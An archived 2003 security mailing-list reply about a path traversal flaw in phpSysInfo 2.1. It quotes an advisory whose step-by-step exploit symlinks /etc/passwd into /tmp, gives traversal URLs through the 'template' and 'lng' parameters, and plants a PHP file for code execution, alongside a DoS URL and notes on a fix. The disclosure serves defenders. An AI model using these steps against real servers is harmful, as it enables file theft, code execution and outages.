lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <3EA97F0F.3000209@wkamphuis.student.utwente.nl>
Date: Fri, 25 Apr 2003 20:31:43 +0200
From: Wolter Kamphuis <security@...mphuis.student.utwente.nl>
To: ripe@...9ezine.org
Subject: Re: Unauthorized reading files on phpSysInfo


Hi,

In bug report #670222 I described the same problem and how to use it to 
DoS the host. Calling "index.php?lng=../../index" creates a run-a-way 
recursive loop, creating a huge load and finally crashing the
apache process. This can easily be used to DoS a webserver.
http://sourceforge.net/tracker/index.php?func=detail&aid=670222&group_id=15&atid=100015

On 19 january my fix for this problem has been incorporated in the cvs 
repository. This also fixes the problems described in Albert Puigsech 
Galicia's report.
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/phpsysinfo/phpsysinfo-dev/index.php.diff?r1=1.56&r2=1.57

phpSysInfo 2.1 is vulnerable, the cvs versions after 19 january are not.

mzzl
   Wolter Kamphuis



Albert Puigsech Galicia wrote:
> /-----------------------------------------------------------------------------\
> |                             7 A 6 9 - A d v                          C: 007
> |-----------------------------------------------------------------------------|
> |
> |              [ Unauthorized reading files on phpSysInfo ]
> |
> \-----------------------------------------------------------------------------/
>                                                                 | 01/04/2003 |
> 
> 
> Data.
> -----
> 
>         + Type:         To gain visiblity.
> 
>         + Software:     phpSysInfo.
> 
>         + Verions:      until 2.1 (current version).
> 
>         + Exploit:      Yes (but only local).
> 
>         + Autor:        Albert Puigsech Galicia
> 
>         + Contact:      ripe@...9ezine.org
> 
> 
> 
> Information.
> ------------
> 
>         PhpSysInfo is a litle PHP script destined to show system information.
> It shows data like CPU or memory usage, Disk usage, PCI, ethernet, and IDE
> information, etc. Visit project website on  http://phpsysinfo.sourceforge.net
> for more info.
> 
> 
> Description.
> ------------
> 
>         PhpSysInfo uses a template system using 'template' variable, and a
> languaje system using 'lng' variable. These variables are used to complete
> a file path without check if it contains the '..' especial directory, allowing
> to read any file on system as webserver user.
> 
> 
> Exploiting.
> -----------
> 
>         The exploit of this vulnerability require write access on a local
> directory where webserver can read files.
> 
>         On template case, phpSysInfo cheks only if template exists. To do
> it only check if 'templates/$template' exists.
> 
> 
> ---/ index.php /---
> 
> if (!((isset($template) && file_exists("templates/$template")) || $template ==
> 'xml')) {
>     // default template we should use if we don't get a argument.
>     $template = 'classic';
> }
> 
> ---/ index.php /---
> 
> 
>         Exactly the same on languaje selection system.
> 
> 
> ---/ index.php /---
> 
> if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
>     $lng = 'en';
>     // see if the browser knows the right languange.
>     if(isset($HTTP_ACCEPT_LANGUAGE)) {
>         $plng = split(',', $HTTP_ACCEPT_LANGUAGE);
>         if(count($plng) > 0) {
>             while(list($k,$v) = each($plng)) {
>                 $k = split(';', $v, 1);
>                 $k = split('-', $k[0]);
>                 if(file_exists('./includes/lang/' . $k[0] . '.php')) {
>                     $lng = $k[0];
>                     break;
>                 }
>             }
>         }
>     }
> }
> 
> ---/ index.php /---
> 
>         'template, variable will be used to use the file
> './templates/$template/form.tpl' and './templates/$template/box.tpl'
> for template stuff, so is necesary ti create the symlinks to read
> any file allowed to webserver.
> 
> 
>         local ~$ ln -s /etc/passwd /tmp/form.tpl
>         local ~$ ln -s /etc/passwd /tmp/box.tpl
> 
>         http://vulnerable/index.php?template=../../../../tmp
> 
> 
>         'lng' variable is used on this peace of code:
> 
> ---/ index.php /---
> 
> require('./includes/lang/' . $lng . '.php');   // get our language include
> 
> ---/ index.php /---
> 
> 
>         It allow us, as the same way as 'template' to read a file on
> the system.
> 
> 
>         local ~$ ln -s /etc/passwd /tmp/p.php
> 
>         http://vulnerable/index.php?lng=../../../../tmp/p
> 
> 
>         But it also allow to execute arbitrary PHP code, creating the php
> file firts.
> 
> 
>         local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php
> 
>         http://vulnerable/index.php?lng=../../../../tmp/p
> 
> 
>         The use of '.' php function to concat strings remote exploit for
> this vulnerable php script, because we cant use %00 to end the string.
> 
> 
> Patch.
> ------
> 
>         There is not an oficial patch, but is easy to code it adding some
> regex on the code to filter '..' content on 'template' and 'lng' variables.
> 
> 
> 
> --
> 
>>====================================
>>Albert Puigsech Galicia (7a69)
>>
>>http://ripe.7a69ezine.org
>>====================================
> 
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ